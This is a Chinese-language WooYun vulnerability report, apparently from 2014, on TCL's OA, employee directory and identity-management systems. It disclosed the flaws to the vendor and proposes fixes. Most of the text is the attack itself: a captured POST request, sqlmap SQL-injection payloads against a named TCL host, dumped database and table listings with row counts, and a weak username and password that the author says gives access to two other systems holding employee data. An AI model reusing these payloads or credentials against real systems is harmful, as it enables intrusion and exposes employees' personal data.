TCL某重要系统漏洞大礼包（sql注入、弱口令、信息泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048000

漏洞标题：TCL某重要系统漏洞大礼包（sql注入、弱口令、信息泄露）

漏洞作者： Mr.leo

提交时间：2014-01-06 11:16

修复时间：2014-02-20 11:16

公开时间：2014-02-20 11:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-01-06：细节已通知厂商并且等待厂商处理中
2014-01-06：厂商已经确认，细节仅向厂商公开
2014-01-16：细节向核心白帽子及相关领域专家公开
2014-01-26：细节向普通白帽子公开
2014-02-05：细节向实习白帽子公开
2014-02-20：细节向公众公开

简要描述：

TCL某重要系统漏洞大礼包（sql注入、弱口令、信息泄露）

详细说明：

站点1：
oa.king.tcl.com TCLoa办公系统
使用搜索引擎，搜索关键字，发现该系统出现2个域名

故再次进行了一次安全测试
与 WooYun: TCL#某重要办公系统存在漏洞导致SQL注射及信息泄露属于同一系统，不过域名不同，厂商是不是部署了2套oa系统，忘了统一了？
ip反查也标明2个域名访问的页面相同，不过ip地址不同

http://oa.king.tcl.com/management/Regeist/Region.aspx
此页面的txt_Account参数没有过滤导致注射漏洞
burp抓post包

POST /management/Regeist/Region.aspx HTTP/1.1
Content-Length: 907
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://oa.king.tcl.com/management/Regeist/Region.aspx
Host: oa.king.tcl.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
cmdReturn=%b7%b5%20%bb%d8&cmdSubmit=%c8%b7%b6%a8&DDL_Area=GIC&rSex=rb_male&txtEmail=sample%40email.tst&txtMobile=987-65-4329&txtPassword=g00dPa%24%24w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa%24%24w0rD&txt_Account=123&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK%2bxZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O%2bjDwKs14G9BgL43vDkCgL%2biJimAgKWxZPnCQKFkp%2bkDQKZko%2bnDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP%2bWCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg%3d
sqlmap identified the following injection points with a total of 97 HTTP(s) requests:
---
Place: POST
Parameter: txt_Account
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(97)+CHAR(114)+CHAR(115)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(71)+CHAR(77)+CHAR(100)+CHAR(117)+CHAR(58)+CHAR(115)+CHAR(115)+CHAR(114)+CHAR(58)-- &txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123'; WAITFOR DELAY '0:0:5';--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' WAITFOR DELAY '0:0:5'--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_Account
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(97)+CHAR(114)+CHAR(115)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(71)+CHAR(77)+CHAR(100)+CHAR(117)+CHAR(58)+CHAR(115)+CHAR(115)+CHAR(114)+CHAR(58)-- &txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123'; WAITFOR DELAY '0:0:5';--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' WAITFOR DELAY '0:0:5'--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
---
current user:    'GICHrmDB'
current database:    'Hrm'
available databases [12]:
[*] distribution
[*] ECS
[*] Hrm
[*] Hrm_OEM
[*] HRM_SZ
[*] master
[*] model
[*] msdb
[*] OutStock
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: Hrm
[188 tables]
+------------------------------+
| dbo.AUTHORIZATION_TO_PAYMENT |
| dbo.Budge_right_tree         |
| dbo.DevCmds                  |
| dbo.Devinfo                  |
| dbo.DinSysAccount            |
| dbo.FAPAYMODEL               |
| dbo.FAPINGZHENMODEL          |
| dbo.FASUBJECT                |
| dbo.FaceTmp                  |
| dbo.Finance_MainIndex        |
| dbo.G4_worktimetable         |
| dbo.HR_ConBase               |
| dbo.HR_DeptToWorkNo          |
| dbo.HR_UserGroup             |
| dbo.HR_condition             |
| dbo.Hr_OutDept               |
| dbo.Hr_Position              |
| dbo.Hr_Position_Bak          |
| dbo.Hr_SelectTemp            |
| dbo.Hrm_Freeze               |
| dbo.Kq_AllWorkHour           |
| dbo.OACITY                   |
| dbo.OAPROMARY                |
| dbo.OASUPPLIERNO             |
| dbo.OA_Account               |
| dbo.OA_AccountRight          |
| dbo.OA_BC_BudgetCost         |
| dbo.OA_BC_FreebackMSG        |
| dbo.OA_BC_VariableCost       |
| dbo.OA_BC_userright          |
| dbo.OA_Car_Booking           |
| dbo.OA_Car_Driver            |
| dbo.OA_Car_Info              |
| dbo.OA_CartNO                |
| dbo.OA_CompanyTemp           |
| dbo.OA_Controlsub            |
| dbo.OA_DocuMentList          |
| dbo.OA_EmailRemind           |
| dbo.OA_EmailRemindtest       |
| dbo.OA_Exam_DB               |
| dbo.OA_Exam_ExamMain         |
| dbo.OA_Exam_Options          |
| dbo.OA_FB_Mainmast           |
| dbo.OA_FinanceList           |
| dbo.OA_FinancePayMent        |
| dbo.OA_GICFinancial          |
| dbo.OA_Hr_CommunicationBase  |
| dbo.OA_Hr_DictDB             |
| dbo.OA_Hr_EducationBase      |
| dbo.OA_Hr_EmployeeBase       |
| dbo.OA_Hr_EmployeeBaseSed    |
| dbo.OA_Hr_FamilyBase         |
| dbo.OA_Hr_LaborContract      |
| dbo.OA_Hr_LanguageBase       |
| dbo.OA_Hr_NationalTitles     |
| dbo.OA_Hr_WorkExperience     |
| dbo.OA_MES_Board             |
| dbo.OA_MainDocuMent          |
| dbo.OA_MeetingQuitment       |
| dbo.OA_MeetingRoom           |
| dbo.OA_Meetingarea           |
| dbo.OA_MessTrans             |
| dbo.OA_MsgTemp               |
| dbo.OA_NextDeptCode          |
| dbo.OA_Post                  |
| dbo.OA_PostAccount           |
| dbo.OA_ReplacecardRecord     |
| dbo.OA_Role                  |
| dbo.OA_SMS                   |
| dbo.OA_UserRole              |
| dbo.OA_WarehouseAuthorized   |
| dbo.OA_base                  |
| dbo.OA_companydetail         |
| dbo.OA_companymast           |
| dbo.OA_companymast_bak       |
| dbo.OA_deptleadership        |
| dbo.OA_fiveSgr               |
| dbo.OA_fiveSmsg              |
| dbo.OMS_DocMain              |
| dbo.OMS_MeetTable            |
| dbo.OMS_Members              |
| dbo.Oa_BC_Actualcost         |
| dbo.Oa_BC_BUSapcodeTable     |
| dbo.Oa_BC_BusinessCodeTable  |
| dbo.Oa_BC_ChangeCode         |
| dbo.Oa_BC_CodeTable          |
| dbo.Oa_BC_Costrate           |
| dbo.Oa_BC_FXrate             |
| dbo.Oa_BC_SapcodeTable       |
| dbo.Oa_BC_SubTable           |
| dbo.Oa_Dictionary            |
| dbo.Oa_Position              |
| dbo.Oa_RightMast             |
| dbo.Oa_dept                  |
| dbo.Oms_FileList             |
| dbo.Oms_ItemDetail           |
| dbo.Oms_ItemLog              |
| dbo.Oms_ItemMenPer           |
| dbo.Oms_ModelDetail          |
| dbo.Oms_ModelMain            |
| dbo.ProjectBase              |
| dbo.ProjectItem              |
| dbo.ProjectLog               |
| dbo.SyncTemp                 |
| dbo.Sys_PrgMast              |
| dbo.System_Menu              |
| dbo.System_PrgMast           |
| dbo.System_Update            |
| dbo.System_UserMast          |
| dbo.Table_1                  |
| dbo.Tmp_10                   |
| dbo.Tmp_9                    |
| dbo.Tmp_90                   |
| dbo.UserInfo                 |
| dbo.WF_Delegate              |
| dbo.WF_ModelDetail           |
| dbo.WF_ModelMast             |
| dbo.[��ѯ]                       |
| dbo.att_record               |
| dbo.budget_upload_excel      |
| dbo.deptMesTOHrm             |
| dbo.dtproperties             |
| dbo.fix_category             |
| dbo.fix_dictdb               |
| dbo.fix_fixedmast            |
| dbo.fix_mark                 |
| dbo.fix_mess                 |
| dbo.fix_news                 |
| dbo.fix_orders               |
| dbo.fix_sorts                |
| dbo.hr_AddrSFZ               |
| dbo.hr_RzEmailInfo           |
| dbo.hr_base                  |
| dbo.hr_class                 |
| dbo.hr_department            |
| dbo.hr_dept                  |
| dbo.hr_deptcopy              |
| dbo.hr_emp_titles            |
| dbo.hr_employee              |
| dbo.hr_employeeBF            |
| dbo.hr_employeeForSAP319     |
| dbo.hr_employee_lz           |
| dbo.hr_employee_rz           |
| dbo.hr_employee_tp           |
| dbo.hr_employee_tpback       |
| dbo.kq_DoorRecord            |
| dbo.kq_LZDate                |
| dbo.kq_Machines              |
| dbo.kq_SpeOverTimeR          |
| dbo.kq_SpeWorkRecord         |
| dbo.kq_auto_Machines         |
| dbo.kq_base                  |
| dbo.kq_cardlist              |
| dbo.kq_finger                |
| dbo.kq_holiday               |
| dbo.kq_leave                 |
| dbo.kq_leaveDay              |
| dbo.kq_leave_bak             |
| dbo.kq_leave_main            |
| dbo.kq_leavemonth            |
| dbo.kq_machines_emp          |
| dbo.kq_machines_log          |
| dbo.kq_monthgs               |
| dbo.kq_overtime              |
| dbo.kq_overtime_bak          |
| dbo.kq_transpose             |
| dbo.kq_transpose_bak         |
| dbo.kq_workday               |
| dbo.kq_workday_bak           |
| dbo.kq_workday_checkUp       |
| dbo.kq_workmonth             |
| dbo.kq_workmonth_lz          |
| dbo.kq_workrecord            |
| dbo.kq_workrecord_bak        |
| dbo.kq_worktimetable         |
| dbo.oa_TotalMoney            |
| dbo.oa_TotalMoneySAP         |
| dbo.oa_TotalMoney_Test       |
| dbo.oa_accountbak            |
| dbo.oa_totalmoney_Copy       |
| dbo.oa_totalmoney_bak        |
| dbo.sys_user                 |
| dbo.sys_userright            |
| dbo.sysdiagrams              |
| dbo.system_Per               |
| dbo.tb_Temp                  |
| dbo.temptable                |
+------------------------------+
数据量还是很大的，截取一部分说明问题
Database: Hrm
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.kq_workrecord_bak        | 22712493 |
| dbo.kq_workday_bak           | 11426503 |
| dbo.kq_workrecord            | 6574826 |
| dbo.kq_transpose_bak         | 6475205 |
| dbo.kq_overtime_bak          | 4174567 |
| dbo.kq_transpose             | 2766671 |
| dbo.OA_companydetail         | 1244995 |
| dbo.kq_workday               | 995213  |
| dbo.kq_SpeWorkRecord         | 791875  |
| dbo.kq_leave                 | 738136  |
| dbo.kq_overtime              | 569546  |
| dbo.kq_leave_bak             | 532771  |
| dbo.kq_workmonth             | 407692  |
| dbo.OA_companymast           | 344432  |
| dbo.kq_SpeOverTimeR          | 321922  |
| dbo.OA_ReplacecardRecord     | 242114  |
| dbo.hr_deptcopy              | 233575  |
| dbo.kq_workday_checkUp       | 202105  |
| dbo.Hr_Position_Bak          | 169622  |
| dbo.Oa_BC_Actualcost         | 155838  |
| dbo.kq_machines_log          | 93600   |
| dbo.budget_upload_excel      | 93573   |
| dbo.kq_finger                | 68149   |
| dbo.OA_FinanceList           | 55843   |
| dbo.hr_employee_lz           | 38769   |
| dbo.kq_DoorRecord            | 37621   |
| dbo.sys_userright            | 35108   |
| dbo.kq_leavemonth            | 31675   |
| dbo.hr_employee_rz           | 27487   |
| dbo.kq_machines_emp          | 24929   |
| dbo.OA_Hr_EmployeeBase       | 22409   |
| dbo.kq_leaveDay              | 18155   |
| dbo.Kq_AllWorkHour           | 14382   |
| dbo.Tmp_9                    | 13219   |
| dbo.oa_TotalMoney            | 13195   |
| dbo.kq_cardlist              | 12801   |
| dbo.OA_MeetingRoom           | 12118   |
| dbo.Hr_Position              | 11497   |
| dbo.hr_employeeBF            | 10253   |
| dbo.hr_employee              | 9606    |
| dbo.OA_BC_BudgetCost         | 9125    |
| dbo.OA_Hr_EmployeeBaseSed    | 8550    |
| dbo.Oms_ItemLog              | 8432    |
| dbo.oa_totalmoney_bak        | 8033    |
| dbo.oa_TotalMoneySAP         | 7915    |
| dbo.hr_employeeForSAP319     | 7366    |
| dbo.UserInfo                 | 7243    |
| dbo.Tmp_90                   | 7238    |
| dbo.OMS_Members              | 7110    |
| dbo.Oms_ItemMenPer           | 6367    |
| dbo.kq_LZDate                | 5820    |
| dbo.OA_CompanyTemp           | 5518    |
| dbo.WF_ModelDetail           | 4871    |
| dbo.FAPAYMODEL               | 4735    |
| dbo.FAPINGZHENMODEL          | 4684    |
| dbo.OA_Account               | 4404    |
| dbo.OA_SMS                   | 4339    |
| dbo.AUTHORIZATION_TO_PAYMENT | 3665    |
| dbo.hr_AddrSFZ               | 3515    |
| dbo.OA_AccountRight          | 3446    |
| dbo.Budge_right_tree         | 3394    |
| dbo.OA_CartNO                | 3156    |

站点2：
http://eip.tcl.com/phones/login.aspx TCL集团通讯录平台
直接访问eip.tcl.com，提示网站建设中

使用谷歌搜索引擎进行关键字识别

用户名密码弱口令 lif 111111
登录通讯录平台，1w多员工信息泄露。

站点3：
http://idm.tcl.com/WebConsole/login/login.jsp TCL统一身份管理系统
依旧使用弱口令lif 111111 可以进入
未深入

over

漏洞证明：

已经证明

修复方案：

1#统一域名和ip地址的管理
2#过滤参数
3#加强安全培训，杜绝弱口令
4#过年了是不是送点礼物呢
5#高rank

版权声明：转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-01-06 11:25

厂商回复：

感谢您的关注，已转交相关公司确认处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048000

漏洞标题：TCL某重要系统漏洞大礼包（sql注入、弱口令、信息泄露）

相关厂商：TCL官方网上商城

漏洞作者： Mr.leo

提交时间：2014-01-06 11:16

修复时间：2014-02-20 11:16

公开时间：2014-02-20 11:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048000

漏洞标题：TCL某重要系统漏洞大礼包（sql注入、弱口令、信息泄露）

相关厂商：TCL官方网上商城

漏洞作者： Mr.leo

提交时间：2014-01-06 11:16

修复时间：2014-02-20 11:16

公开时间：2014-02-20 11:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-048000"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：